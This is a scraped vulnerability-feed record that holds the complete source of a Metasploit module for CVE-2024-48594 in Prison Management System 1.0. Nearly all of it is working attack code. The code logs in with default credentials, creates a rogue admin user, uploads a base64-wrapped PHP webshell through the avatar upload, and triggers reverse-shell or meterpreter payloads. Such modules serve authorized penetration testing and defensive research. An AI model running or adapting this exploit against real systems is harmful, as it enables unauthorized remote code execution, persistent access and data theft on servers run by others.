{“lastseen”:”2026-01-08T19:04:55″,”description”:”This module exploits an unrestricted file upload vulnerability in Prison Management System 1.0. An authenticated user can upload a PHP file with arbitrary content by abusing the avatar upload functionality in the add-admin.php endpoint. The application…”,”published”:”2026-01-08T18:56:39″,”modified”:”2026-01-08T18:56:39″,”type”:”metasploit”,”title”:”Prison Management System 1.0 Authenticated RCE via Unrestricted File Upload”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-LINUX-HTTP-PRISON_MANAGEMENT_RCE-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-48594″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Exploit::FileDropper\\n prepend Msf::Exploit::Remote::AutoCheck\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Prison Management System 1.0 Authenticated RCE via Unrestricted File Upload’,\\n ‘Description’ =\\u003e %q{\\n This module exploits an unrestricted file upload vulnerability in Prison Management System 1.0.\\n An authenticated user can upload a PHP file with arbitrary content by abusing the avatar upload\\n functionality in the add-admin.php endpoint. The application fails to properly validate the\\n uploaded file type, allowing an attacker to upload a PHP webshell.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘Alexandru Ionut Raducu’,\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2024-48594’],\\n [‘URL’, ‘https:\/\/www.sourcecodester.com\/sql\/17287\/prison-management-system.html’]\\n ],\\n ‘Platform’ =\\u003e [‘php’, ‘unix’, ‘linux’],\\n ‘Arch’ =\\u003e [ARCH_PHP, ARCH_CMD],\\n ‘Targets’ =\\u003e [\\n [\\n ‘PHP’,\\n {\\n ‘Platform’ =\\u003e ‘php’,\\n ‘Arch’ =\\u003e ARCH_PHP,\\n ‘DefaultOptions’ =\\u003e { ‘PAYLOAD’ =\\u003e ‘php\/meterpreter\/reverse_tcp’ },\\n ‘Type’ =\\u003e :php\\n }\\n ],\\n [\\n ‘Unix Command’,\\n {\\n ‘Platform’ =\\u003e ‘unix’,\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘DefaultOptions’ =\\u003e { ‘PAYLOAD’ =\\u003e ‘cmd\/unix\/reverse_bash’ },\\n ‘Type’ =\\u003e :unix_cmd\\n }\\n ],\\n [\\n ‘Linux Dropper’,\\n {\\n ‘Platform’ =\\u003e ‘linux’,\\n ‘Arch’ =\\u003e [ARCH_X64, ARCH_X86],\\n ‘DefaultOptions’ =\\u003e { ‘PAYLOAD’ =\\u003e ‘linux\/x64\/meterpreter\/reverse_tcp’ },\\n ‘Type’ =\\u003e :linux_dropper\\n }\\n ]\\n ],\\n ‘Privileged’ =\\u003e false,\\n ‘DisclosureDate’ =\\u003e ‘2024-10-28’,\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\\n }\\n )\\n )\\n\\n register_options([\\n OptString.new(‘TARGETURI’, [true, ‘The base path to Prison Management System’, ‘\/’]),\\n OptString.new(‘USERNAME’, [true, ‘Username for authentication’, ‘admin’]),\\n OptString.new(‘PASSWORD’, [true, ‘Password for authentication’, ‘admin123’])\\n ])\\n end\\n\\n def check\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘Admin’, ‘login.php’)\\n )\\n\\n return CheckCode::Unknown(‘Connection failed’) unless res\\n return CheckCode::Detected(\\”Unexpected response code: #{res.code}\\”) unless res.code == 200\\n\\n if res.body.include?(‘Prison Management System’) || res.body.include?(‘txtusername’)\\n return CheckCode::Detected(‘Prison Management System login page detected’)\\n end\\n\\n CheckCode::Safe(‘Target does not appear to be Prison Management System’)\\n end\\n\\n def login\\n print_status(\\”Attempting to authenticate as #{datastore[‘USERNAME’]}…\\”)\\n\\n # First GET request to obtain session cookie\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘Admin’, ‘login.php’),\\n ‘keep_cookies’ =\\u003e true\\n )\\n\\n fail_with(Failure::Unreachable, ‘Connection failed while fetching login page’) unless res\\n fail_with(Failure::UnexpectedReply, \\”Unexpected response code: #{res.code}\\”) unless res.code == 200\\n\\n vprint_status(\\”Retrieved session cookie: #{res.get_cookies}\\”)\\n\\n # POST login credentials\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘Admin’, ‘login.php’),\\n ‘keep_cookies’ =\\u003e true,\\n ‘vars_post’ =\\u003e {\\n ‘txtusername’ =\\u003e datastore[‘USERNAME’],\\n ‘txtpassword’ =\\u003e datastore[‘PASSWORD’],\\n ‘btnlogin’ =\\u003e ”\\n }\\n )\\n\\n fail_with(Failure::Unreachable, ‘Connection failed during login’) unless res\\n\\n fail_with(Failure::NoAccess, ‘Login failed – invalid credentials’) unless res.code == 302\\n\\n print_good(‘Successfully authenticated!’)\\n end\\n\\n def upload_webshell\\n @webshell_name = Rex::Text.rand_text_alpha(8) + ‘.php’\\n\\n case target[‘Type’]\\n when :php\\n php_payload = payload.encoded\\n when :unix_cmd\\n php_payload = \\”\\u003c?php system(base64_decode(‘#{Rex::Text.encode_base64(payload.encoded)}’)); ?\\u003e\\”\\n when :linux_dropper\\n php_payload = \\”\\u003c?php system(base64_decode(‘#{Rex::Text.encode_base64(payload.encoded)}’)); ?\\u003e\\”\\n end\\n\\n # Generate random form data for the new admin user\\n random_username = Rex::Text.rand_text_alpha(8)\\n random_fullname = Rex::Text.rand_text_alpha(8)\\n random_password = Rex::Text.rand_text_alpha(8)\\n random_phone = Rex::Text.rand_text_numeric(10)\\n\\n print_status(\\”Uploading webshell as #{@webshell_name}…\\”)\\n\\n # Build multipart form data\\n form_data = Rex::MIME::Message.new\\n form_data.add_part(random_username, nil, nil, ‘form-data; name=\\”txtusername\\”‘)\\n form_data.add_part(random_fullname, nil, nil, ‘form-data; name=\\”txtfullname\\”‘)\\n form_data.add_part(random_password, nil, nil, ‘form-data; name=\\”txtpassword\\”‘)\\n form_data.add_part(random_phone, nil, nil, ‘form-data; name=\\”txtphone\\”‘)\\n form_data.add_part(”, nil, nil, ‘form-data; name=\\”btncreate\\”‘)\\n form_data.add_part(php_payload, ‘image\/jpeg’, nil, \\”form-data; name=\\\\\\”avatar\\\\\\”; filename=\\\\\\”#{@webshell_name}\\\\\\”\\”)\\n\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘Admin’, ‘add-admin.php’),\\n ‘ctype’ =\\u003e \\”multipart\/form-data; boundary=#{form_data.bound}\\”,\\n ‘data’ =\\u003e form_data.to_s,\\n ‘keep_cookies’ =\\u003e true\\n )\\n\\n fail_with(Failure::Unreachable, ‘Connection failed during upload’) unless res\\n fail_with(Failure::UnexpectedReply, ‘File upload failed’) unless res.code == 200 \\u0026\\u0026 res.body.include?(‘User Added Successfully’)\\n\\n @webshell_path = normalize_uri(target_uri.path, ‘uploadImage’, ‘Profile’, @webshell_name)\\n register_file_for_cleanup(@webshell_name)\\n\\n print_good(\\”Webshell uploaded to #{@webshell_path}\\”)\\n end\\n\\n def execute_webshell\\n print_status(‘Triggering payload execution…’)\\n\\n send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e @webshell_path,\\n ‘keep_cookies’ =\\u003e true\\n }, 5)\\n end\\n\\n def exploit\\n login\\n upload_webshell\\n execute_webshell\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/linux\/http\/prison_management_rce.rb”,”cvss”:{“score”:8.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/linux\/http\/prison_management_rce\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-08T19:04:55″,”description”:”This module exploits an unrestricted file upload vulnerability in Prison Management System 1.0. An authenticated user can upload a PHP file with arbitrary content by…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,41,12,15,169,13,7,11,5],"class_list":["post-34751","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-88","tag-exploit","tag-high","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n